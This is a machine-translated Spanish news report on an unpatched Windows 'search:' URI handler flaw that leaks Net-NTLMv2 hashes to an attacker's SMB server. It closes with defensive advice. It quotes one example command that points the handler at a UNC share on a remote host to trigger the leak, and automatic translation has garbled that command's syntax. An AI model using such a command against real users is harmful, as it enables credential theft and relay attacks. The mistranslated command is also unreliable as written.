Investigadores de ciberseguridad han revelado detalles de un problema sin parchear que podría explotarse para revelar los hashes NTLMv2 de los usuarios a los atacantes.
Al igual que CVE-2026-33829, que afectó al controlador ms-screensketch: URI de la herramienta de recorte de Windows, Huntress dijo que el problema recientemente informado está en la búsqueda: controlador URI.
CVE-2026-33829 hace referencia a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un atacante no autorizado. Parcheado por Microsoft en abril de 2026.
«Al incrustar el enlace en una página web o mensaje de correo electrónico, un atacante podría engañarlo para que haga clic en un enlace especialmente diseñado en un navegador web u otra fuente URL», dijo Microsoft en un aviso en ese momento.
«Si el usuario aprueba el inicio del enlace, una URL diseñada podría engañar a la computadora para que se conecte a un servidor SMB elegido por el atacante. Esto podría revelar el hash NTLMv2 del usuario al atacante, quien luego podría usarlo para autenticarse como usuario».
Específicamente, el problema estaba relacionado con el hecho de que el controlador de URI de la herramienta de recorte aceptó un parámetro «filePath», no pudo validarlo y accedió a cualquier ruta de la Convención de nomenclatura universal (UNC) que se le pasó. Esto podría activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.
El inconveniente recién descubierto es utilizar un comando como el siguiente para lograr el mismo objetivo final usando «search:» y «crumb=location:» en lugar de «filePath».
Inicio «» «Buscar:Consulta=Prueba&Cram=Ubicación:\\10.0.1.100\share»
El investigador de Huntress, Andrew Schwartz, dijo: «Se utilizó el mismo mecanismo de fuga NTLM, se produjo la misma fuga Net-NTLMv2, estaban presentes los mismos requisitos previos y la misma calificación moderada». Vale la pena señalar que Varonis documentó el uso del parámetro «crumb» para robar hashes (CVE-2023-35636) en febrero de 2024.
Como resultado, un atacante podría aprovechar los hashes capturados para realizar ataques de retransmisión y obtener un acceso más profundo a la red. Después de una divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema y afirmó que «solo los casos importantes y graves cumplen con nuestros estándares de servicio».
A falta de una solución, recomendamos bloquear el SMB saliente (TCP/445 y TCP/139) en los hosts que no lo requieren, aplicar la firma SMB para que los hashes capturados no se transmitan a los servicios internos y deshabilitar NTLM, si corresponde.
Source link
